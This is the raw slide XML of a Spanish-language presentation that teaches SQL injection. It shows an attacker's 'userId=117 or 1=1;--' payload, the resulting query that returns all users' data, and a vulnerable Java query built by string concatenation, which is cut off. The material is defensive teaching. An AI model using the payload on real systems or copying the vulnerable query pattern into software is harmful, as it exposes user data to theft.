                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6D7465-9A72-F375-1B51-59FAC6C566C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2447330" y="2434104"/>
            <a:ext cx="6336541" cy="3174763"/>
            <a:chOff x="1706186" y="3194500"/>
            <a:chExt cx="6336541" cy="3174763"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Signo menos 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DFAEF85-16AB-3884-B1A0-E5B5CDABD974}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21300000">
              <a:off x="1725631" y="4496127"/>
              <a:ext cx="6297651" cy="721176"/>
            </a:xfrm>
            <a:prstGeom prst="mathMinus">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s-ES">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Flecha: hacia abajo 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD9A83CE-EC2E-CBD0-3162-6DF54FAB4165}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2466571" y="3344166"/>
              <a:ext cx="1900962" cy="1344487"/>
            </a:xfrm>
            <a:prstGeom prst="down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24" name="Forma libre: forma 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FAC087F-0693-9975-807D-6C586A588393}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1706186" y="3194500"/>
              <a:ext cx="2027693" cy="1411711"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2027693"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1411711"/>
                <a:gd name="connsiteX1" fmla="*/ 2027693 w 2027693"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1411711"/>
                <a:gd name="connsiteX2" fmla="*/ 2027693 w 2027693"/>
                <a:gd name="connsiteY2" fmla="*/ 1411711 h 1411711"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2027693"/>
                <a:gd name="connsiteY3" fmla="*/ 1411711 h 1411711"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2027693"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1411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3" h="1411711">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2027693" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027693" y="1411711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1411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0" tIns="355600" rIns="355600" bIns="355600" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="2222500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="es-ES" sz="5000" kern="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Flecha: hacia arriba 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE326A5D-287B-5F3B-8ADA-551B74E63FC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5381380" y="5024776"/>
              <a:ext cx="1900962" cy="1344487"/>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26" name="Forma libre: forma 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F0BC58-C114-B56D-EE64-1ABC16D416F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6015034" y="4706094"/>
              <a:ext cx="2027693" cy="1411711"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2027693"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1411711"/>
                <a:gd name="connsiteX1" fmla="*/ 2027693 w 2027693"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1411711"/>
                <a:gd name="connsiteX2" fmla="*/ 2027693 w 2027693"/>
                <a:gd name="connsiteY2" fmla="*/ 1411711 h 1411711"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2027693"/>
                <a:gd name="connsiteY3" fmla="*/ 1411711 h 1411711"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2027693"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1411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3" h="1411711">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2027693" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027693" y="1411711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1411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endParaRPr lang="es-ES" sz="4000" kern="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Imagen 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FB59F4-3558-3CC0-FCF9-C9FCDD502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6844" y="3210336"/>
            <a:ext cx="626991" cy="626991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D47AE183-E5C4-88EA-FA08-AEB7827CAB0E}"/>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441419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09599-8B24-D1C7-E110-56239B620D6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E6F9ACE-FB39-2EB2-ADFE-449847CA7008}"/>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D50462-2595-5B0D-636F-EC24037A60AD}"/>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Inyección SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD3D915-76E8-B8B9-82A0-1AC45718FF32}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E6B811A-B9B3-C10E-9FFB-2964CA47B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0669" y="2477216"/>
            <a:ext cx="1128616" cy="1394283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E83501-43CF-7E35-6B4B-8DA1BAC3ACED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959138" y="3964104"/>
            <a:ext cx="13306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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E17B0CA-1C1D-1E2D-6146-57EA1896E470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4941927" y="4070718"/>
            <a:ext cx="1334690" cy="66591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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Servidor web</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FADFF7-8CDA-A4FE-0926-3B85F55375CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10251652" y="4139226"/>
            <a:ext cx="1117072"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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Servidor Base de Datos SQL</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCC6F907-3E81-F5D4-3744-CF9D76255AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966336" y="1855897"/>
            <a:ext cx="289412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http://users.com?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>117 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> 1=1;--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CuadroTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB0969A-2446-66BB-F725-569714AE7488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508035" y="1885250"/>
            <a:ext cx="34683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SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>117 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Arrow: Right 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB25EC81-3E96-DC2C-CF1A-52DCD3B88CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687807" y="2660249"/>
            <a:ext cx="1377495" cy="435014"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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16" name="Arrow: Right 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D8273FC-24E3-E83A-D8C1-6CD91E152C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2687808" y="3308518"/>
            <a:ext cx="1377495" cy="435014"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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17" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A28B5FA-2A57-EE22-4E6A-A69ED29BB5DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2527853" y="4035059"/>
            <a:ext cx="192728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Se devuelven todos los datos al atacante</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Arrow: Right 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE39338-870D-1AC1-3F86-4FF89D3482F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554656" y="2668928"/>
            <a:ext cx="1377495" cy="435014"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009D89"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="009D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1" name="Arrow: Right 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD3C341-E7DF-008A-5521-5CFE1905CA01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7554655" y="3317196"/>
            <a:ext cx="1377495" cy="435014"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009D89"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="009D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2" name="CuadroTexto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A9D3810-1F37-B813-045B-F1B4AF980145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7410495" y="4074196"/>
            <a:ext cx="1809774"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rPr>
              <a:t>Devuelve los datos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>todos los usuarios</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3221638-3FC0-DEB7-9F18-DE2C4E339C92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097451" y="2355178"/>
            <a:ext cx="927958" cy="1388149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 4" descr="Ver las imágenes de origen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40658A53-9E67-4B63-4B24-136231DFA5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4627" y="2711003"/>
            <a:ext cx="1667630" cy="111200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Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA65C595-1D90-4F7F-7786-E0EFEB623587}"/>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0426080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F6F9-143D-3E81-0297-2A9FA45453F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9B77367-6DA5-D7FA-E38E-E67097CAA1D8}"/>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3F0F5C0-0186-7345-0707-EF3F21502288}"/>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Inyección SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6633A50B-13C3-D98C-3D1C-ED917C2EF2F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9" name="CuadroTexto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD8C27B5-692B-1DE6-C841-CFA1781CC1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516682" y="1619731"/>
            <a:ext cx="10251502" cy="1754326"/>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Una aplicación utiliza datos no confiables a través de la siguiente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>llamada SQL vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "SELECT \* FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
